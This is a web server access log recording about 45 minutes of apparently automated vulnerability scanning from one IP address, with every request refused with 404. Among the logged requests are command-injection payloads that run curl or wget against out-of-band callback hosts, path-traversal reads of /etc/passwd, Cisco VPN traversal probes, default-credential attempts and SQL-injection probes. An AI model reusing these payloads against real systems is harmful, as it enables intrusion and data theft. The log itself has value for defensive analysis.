137.220.197.141 - - [21/Jan/2024:20:31:26 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:34 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:36 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:49 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:50 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:51 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:51 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:32:12 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:32:30 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:32:32 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:32:34 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:32:53 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:32:55 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:33:19 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:33:21 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:33:25 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:33:53 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:33:55 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:13 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:15 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:36 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:38 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:46 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:55 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogusrqaeeqirry9.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:55 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:34:57 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogg5dcar6p173oj.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:35:08 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:35:20 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogrcryysnew9x7m.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:35:22 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogcaqioa5cuogf5.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:35:32 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogkfypres7bgghs.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:35:39 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:35:41 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:36:06 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:36:08 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:36:14 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:36:21 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:36:41 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:37:05 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogy4rb43tmukggy.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:37:16 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogrku67sottdc47.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:37:29 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogoiqx4o48sxbmc.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:37:38 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:37:48 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:37:54 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:00 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:09 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:17 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:21 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:29 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:42 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:38:43 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:39:04 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:39:04 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:39:06 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:39:09 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:39:11 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:40:14 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:40:16 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:40:26 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:40:28 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:40:53 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:41:00 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogitd65eogx1sjk.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:41:39 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:41:44 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:41:46 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:41:55 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsog87xijbqu7oyu4.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:02 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:16 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:16 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:18 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:20 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogysn496w1ow9j5.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:29 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:31 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:43 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:52 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:54 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:57 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:42:59 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:07 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:10 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:12 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:16 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:18 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:20 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:22 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:43:37 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:44:34 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:44:34 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:44:46 +0100] "GET /server/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:45:23 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:45:32 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:46:08 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:46:20 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
46.174.191.28 - - [21/Jan/2024:20:46:25 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:20:46:33 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:46:34 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogd59bb7ogh8bit.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:46:44 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:46:53 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:47:05 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:47:31 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:47:43 +0100] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:47:56 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:48:43 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsog8p7nyn5zg8xo8.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:48:46 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:48:57 +0100] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cmm00rc3m87t5g88qsogzf31de4xaxkkh.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:49:39 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:49:41 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:01 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:09 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:09 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:09 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:19 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:23 +0100] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:31 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:50:50 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:51:07 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:51:13 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:51:33 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:51:45 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:51:47 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:53:29 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:53:36 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:53:38 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:54:01 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:54:03 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:54:18 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:54:40 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:54:59 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:55:59 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:56:11 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:56:13 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:56:38 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:56:40 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:56:53 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:57:06 +0100] "POST /goform/setSysAdm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:58:13 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:58:25 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:58:28 +0100] "GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:00:26 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:00:39 +0100] "POST /actions/authenticate.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:00:44 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:02:10 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:02:20 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:02:33 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:05:16 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:05:38 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:06:04 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:06:06 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:06:29 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:06:43 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:06:52 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:06:54 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:07:07 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:08:55 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:08:57 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:09:17 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:09:19 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:09:43 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:09:45 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:10:11 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:10:47 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:11:01 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:11:25 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:12:26 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:12:49 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:13:03 +0100] "POST /auth/check HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:13:18 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:13:20 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:13:52 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:14:02 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:14:03 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:14:03 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:14:16 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:15:23 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:15:54 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:15:56 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:16:47 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:16:49 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:16:55 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:16:57 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:14 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:16 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:16 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:18 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:21 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:27 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:38 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:40 +0100] "POST /auth/newpassword HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:40 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:42 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:44 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
